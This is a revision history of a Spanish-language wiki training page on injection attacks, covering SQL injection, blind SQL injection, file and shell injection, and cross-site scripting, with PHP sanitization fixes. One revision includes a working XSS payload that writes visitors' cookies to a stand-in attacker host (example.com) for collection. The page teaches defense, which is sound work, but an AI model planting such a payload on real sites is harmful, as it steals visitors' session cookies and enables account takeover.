Revision [525]

Last edited on 2007-11-09 15:57:01 by JavierWilson
Additions:
---
CategorySysAdmin


Revision [523]

Edited on 2007-11-09 15:55:45 by JavierWilson
Additions:
Tipo de capacitación: técnica pública
Deletions:
Tipo de capacitación: pública


Revision [522]

Edited on 2007-11-09 15:55:24 by JavierWilson
Additions:
Enlace: http://en.wikipedia.org/wiki/Code_injection


Revision [521]

Edited on 2007-11-09 15:48:20 by JavierWilson
Additions:
Tipo de capacitación: pública


Revision [520]

Edited on 2007-11-09 15:45:29 by JavierWilson
Additions:
Es la injection de código sql debido a que al guardar información en la base de datos no limpiamos los datos enviados por el usuario.
Limpiar toda variable antes de guardarla. Todas estas soluciones se pueden combinar, en muchos casos se deben combinar:
%%(php)settype($user_id, 'int');%%
**Notas:**
Injection también puede ocurrir a un archivo (RFI remote file injection), o a un comando que luego ejecutemos: shell injection.
Blind Sql Injection: Normalmente injection es facilitada por los mensajes de error, con blind sql injection solo se tiene la opcion de éxito o fracaso, accediendo al catálogo se va construyendo el ataque.
Es el opuesto, de cierto modo, es el injectar código malicioso a los datos para luego actuar al ser mostrados en pantalla.
Generalmente usado para “phishing”. Ataque, injectar en mi blog, o artículo. Un ejemplo que registraria en la bitacora maquina del atacante (example.com), los cookies de todo visitante del sitio donde se colocó el injection.
%%
<script>
document.write('<script src="http://www.example.com/get_cookies?cookies='
document.write(document.cookie)
document.write('"></script>');
</script>
%%
Este ejemplo registraria en la bitacora maquina del atacante (example.com), los cookies
Solución:
Limpiar toda variable que se tome (de la base de datos) a la pantalla.
%%(php)$datos = htmlentities($datos)
# ó
$datos = htmlspecialchars($datos)%%
Deletions:
Al guardar información en la base de datos no limpiamos los datos enviados por el usuario.
Limpiar toda variable antes de guardarla. Esto puede ser tarea del la libreria que usas para acceder los datos.
Todas se pueden combinar, en muchos casos se deben combinar:
%%(php)settype($user_id, 'int');
http://www.php.net/manual/en/function.settype.php
(o ejecutar un shell o guardar un archivo


Revision [519]

The oldest known version of this page was created on 2007-11-09 15:24:39 by JavierWilson
Valid XHTML :: Valid CSS: :: Powered by WikkaWiki